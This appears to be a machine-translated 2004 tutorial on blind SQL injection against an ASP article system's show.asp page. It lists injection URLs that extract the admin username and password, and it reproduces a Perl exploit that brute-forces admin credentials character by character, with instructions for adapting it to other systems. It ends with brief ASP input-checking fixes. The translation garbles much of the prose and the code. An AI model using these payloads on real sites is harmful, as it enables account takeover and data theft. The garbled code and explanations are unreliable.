Author: angel article in Nature: Original release date: 2004-04-02 recently have nothing to do. Help a friend to see the security of the site, this site is using the special edition of the throne article system 2002, this is the latest version, now in July 2003, I don't know how the loophole, first Go to find the code and have the structure that is familiar with the database. When you see show.asp, you find here:
ID = Request ("id") ... ... set = server.createObject ("adoDb.recordset") SQL = "Select * from article where id =" & id ropen SQL, CONN, 1, 3 IF RS. EOF kille = "No This article" else has a vulnerability. There is no filtering of the ID, so you can check the cross-table, as the name suggestions, is the submitted statement to query the data in other tables. This show.asp ID is not checked, put it in Query statement, the query table is Article, we query the username and password in Admin, by submitting subqueries. This is the cross-table query. It is also a kind of SQL Injection. Recently, I have learned Web security, write articles to consolidate. This article involves more knowledge points, it is inevitable, and it is not good to write. If you find that there is a wrong, you want to contact me, communicate. Grateful. Note: In practice, the browser automatically converts spaces in the address bar to% 20. The% 20 included in all submitted statements I have all handled, so everyone can see more clearly. What is the cross-gum query? By submitting equation, the returned page is returned. For example, in submission:
http://127.0.0.1/show.asp?id=1 and 1 = 1 http://127.0.0.1/show.asp?id=1 and 1 = 2 See the back 1 = 1, 1 = 2 is A key, the former value is true, the latter value is false. If the vulnerability exists, two different pages or different error messages returned. Take a specific thing is the special edition of the Pirates of the Pirates We just see. When we submit the first sentence, the article is normally displayed. When submitting the second sentence, return "There is no article" so that we can judge whether the subqueries we submit will get the correct information through the page information. Let's take a look at this SQL query statement. SELECT field from the WHERE a standard, this sentence means that a certain field in a table is inquiry, SELECT MIN (ID) from admin where len (admin) = 5 This sentence can be understood, with a field The string of the ADMIN medium is 5 is the minimum value in the ID field in the application in the admin table. I explain this, I may be more difficult to understand, I explained the meaning of the statement, and the functions involved here will not discuss it, everyone can go over the professional database book. This query statement is the query ID, so returning is the value in the ID field, such as returning 2, then in just now
http://127.0.0.1/show.asp?id=1 and 1 = (Select Min (ID) from admin where len (admin) = 5) is also equivalent to http: // 127.0.0.1/show.asp?id = 1 and 1 = 2 Returns "There is no article", so for the false value, when we submit http://127.0.0.1/show.asp?id=1 and 2 = (Select Min (ID) from admin where len Admin) = 5) Normal display article, explain the Id and equation, so the value in the minimum ID field we have to query is 2. Below I put the result of the submitted statement, all of which can be understood by the above theory. For easy viewing, I have dropped the browser. http://127.0.0.1/show.asp?id=1 and 1 = (Select Min (ID) from admin where qx = 2) // Get the minimum ID value of administrator privileges to 1, http: //127.0. 0.1 / show.asp? Id = 1 and 1 = (select id from admin where len (admin) = 5) // The user name length of the administrator for the ID 1 is 5, http://127.0.0.1/show .asp? id = 1 and 1 = (Select ID from admin where len (pass) = 5) // Gets the password length of the administrator for ID 1 is 5, http://127.0.0.1/show.asp?id = 1 and 1 = (Select ID from admin where left (admin, 5) = admin) // Get the 5-digit user named from the left side of the administrator from the left, http://127.0.0.1/show .asp? id = 1 and 1 = (Select ID from admin where left (pass, 5) = admin) // Get the ID of the ID 1 from the 5-digit password number from the left is admin, pay attention: If in Left ( Pass, 1) = After the numbers, then include single quotes, examples: left (pass, 1) = '1', otherwise the program will be wrong. Making Exploits This will know the username and password of the administrator. However, in practice, no security awareness is 8 bits or less. The username is the same. If we really rely on manual submission of statements. Then we really want to wait until old. Our network fee is not allowed ... so we have to do an Exploit to complete the trivial work for us. EXPLOIT in this area is of course better with Perl. But what should we do this kind of rookie? use as you learn. Modify others. Let's take a look at the CRACK USER & Pass for DV_Article System written by WAWA. Thank WAWA.
#! / usr / bin / perl #the script crack user & pass for dv_article system # code by wawa@21cn.com #grouppage http://www.haowawa.com/ #Homepage http://wawa.haowawa.com/ use IO :: socket; system ('CLS'); $ argc = @argv; if ($ argc! = 4) {print "/ n / n"; print "/ t * the script crack user & pass for dv_article system * / n" PRINT "/ N / T Welcom to www.haowa.com && wawa.haowawa.com/n"; print "/ n / texample: dvtxt.pl 127.0.0.1 /txt/list.asp 53 /" Did not find related articles / "/ n"; print "/ t Dvtxt.pl
@res = & connect; if ("@res"! ~ / $ errInfo /) {print "/ n / t * found ID = Adminid administrator user name length: $ USERLEN bit / N"; Last;} @ @ Dig = (0..9); @ char = (a..z); @ tchar = qw (`~! @ # $ ^ * / (/) _ = - {} []:"; < >? |,. / /); @dic = (@ DIG, @ char, @ tchar); @ DIC1 = (@ char, @ Dig, @ tchar); print "/ n Start Try Get ID = Adminid management User name and password, please wait ... / N "; for ($ userlocat = 1; $ userlocat <= $ userlen; $ userlocat ) {foreach $ usrtemp (@ DIC1) {$ user = $ USERDIC . $ usrtemp; $ way1 = "ID = $ txtId% 20and% 20 '$ user' = (select% 20mid (username, 1, $ userlocat)% 20FM% 20ADMIN% 20where% 20 ID = $ admin); & URL; @res = & connect; if ("@res"! ~ / $ errInfo /) {if ($ userlocat == $ usrlen) {print "/ n / n / t * Get success !!! ID = $ admin ID The name is: $ user / n "; Last;} Print" / n / t * id = $ userLocat bit for $ user "; $ usrdic = $ usrdic. $ Usrtemp; Last;}} For ($ Passlocat = 1; $ Passlocat <= $ Passlen; $ PassLocat ) {Foreach $ PassTemp (@dic) {$ Pass = $ Passdic. $ PassTemp; $ WAY1 = "ID = $ TXTID% 20And% 20 ' $ Pass' = (Select% 20mid (Password, 1, $ Passlocat)% 20FROM% 20Admin% 20where% 20 ID = $ AdminID) "; & URL; @res = & co Nnect; if ("@res"! ~ / $ errInfo /) {if ($ passlocat == $ passlen) {print "/ n / n / t * Get success !!! ID = $ admin ID administrator password is: $ Pass "; Last;} Print" / n / t * id = $ adj to $ Passlocat bit for $ pass "; $ passdic = $ passdic. $ passtemp; last;}}} print / N / N / T * test is completed. Get an administrator privilege for a user name is $ user! * / n "; print" / n / n / n "; #SYSTEM ('Pause'); SUB URL {$ Req = "
GET $ WAY $ WAY1 http / 1.0 / n "." Host: $ host / n "." Referer: $ host / n "." Cookie: / n / n ";} Sub connect {MY $ connection = IO :: Socket :: inet-> new (proto => "tcp", peeraddr => $ host, peerport => $ port) || Die "Sorry! Could Not connect to $ host / n"; Print $ Connection $ Req; My @res = <$ connection; return @res;} In fact, this type of script is almost a matter, using a file's vulnerability to perform a cross-table inquiry. Although you don't understand most of the code, But don't you learn the SQL query statement? We can change this intention of this intention to change this intention to change the version of Exploit to the throne, you can change it. Look this: for $ AdminID = 1; $ AdminID <= 100; $ AdminID ) {$ WAY1 = "? id = $ txtId% 20and% 20 $ adminId = (select% 20min (ID)% 20FROM% 20ADMIN% 20where% 20FLAG = 1)" The above $ adminID variable is to define the value range of the administrator ID 1-100, and it is a variable behind $. (SELECT% 20min (ID)% 20FROM% 20ADMIN% 20where% 20FLAG = 1) Here is We have to change the query statement. The FLAG field in the application of the network is equal to 1. The administrator is the administrator, and the throne is the field Qx equal to 2 is an administrator. We can change Flag = 1 to qx = 2, From% 20Admin means inquiry in admin. Pi-hands and moving network. We don't have to change. The code after the finished code is as follows:
For ($ admin) = 1; $ admin or ) {$ way1 = "? ID = $ txtId% 20and% 20 $ adminID = (select% 20min (ID)% 20FROM% 20ADMIN% 20where% 20qx = 2 ) "; Again, this sentence:
For ($ Passlen = 1; $ Passlen <= 10; $ Passlen ) {$ WAY1 = "? id = $ txtId% 20and% 20 $ passlen = (select% 20Len (password)% 20FROM% 20ADMIN% 20where% 20ID = $ Adminid "; the above is the $ Passlen variable is also defined the range, but also the length of the password. The field of the password of the mobile network is Password, and the throne is PASS, so we have to change Password to PASS, just then this:
For ($ Passlen = 1; $ Passlen <= 50; $ Passlen ) {$ WAY1 = "? id = $ txtId% 20and% 20 $ passlen = (select% 20LEN (pass)% 20FROM% 20ADMIN% 20where% 20ID = $ Adminid "; because the maximum length of the pirates is 50, so we have to change the maximum value of $ passlen to 50 (good metamorphosis), should you change? They are all 依 葫, as long as the table name, the field name, the data length is ok. But I really want to write good EXPLOIT, but I have to force those programming languages. After all, this is a modification of others ... The solution says so many attack methods, how to solve this type of vulnerability. Because it is no check that the file is submitted. Then we have to add some code to check. Add the short code below to the value code and query statements. This will check the submitted variables before placing it in the SQL query statement. If isnumeric ("ID")) = false the response.write ("Do not enter illegal characters") Response.end end if this detects whether the user submitted variable ID is an int type data, so no matter what others are Submit a single quotation mark, a semicolon or an AND 1 = 1, and 1 = 2 is displayed "Do not enter illegal characters" who can judge true and false? Here is also a wake up for the majority of ASP developers. Any variables that placed the SQL query statement must be strictly checked, all special characters are prohibited. Security procedures, users are used safely. There is another way to see this code:
Function isint (STR) DIM L, I isint = false if Trim (Str) = "" or isnull (str) THEN EXIT FUNCTION STR = CSTR (TRIM (STR)) L = LEN (STR) for i = 1 to Lix MID (STR, I, 1)> "9" OR MID (STR, I, 1) <"0" THEN EXIT FUNCTION NEXT ISINT = TRUE End Function Function Checkstr (STR) IF TRIM (STR) = "" OR ISNULL STR) THEN EXIT FUNCTION CHECKSTR = Replace (TRIM (STR), "'", "'") End Function DIM ID Id = Checkstr (Request.QueryString ("ID")) IF isint (ID) = false the response. Redirect "index.asp" END IF has written two function processes to determine if the number is shaped, and some illegal characters are checked. If there is, jump back to the INDEX.ASP page. In fact, as in the above, the first code is more concise and targeted, only INT variables are recognized. Maxating a way is not a bad thing. The method is a variety of, there are still many examples. Everyone goes to explore.
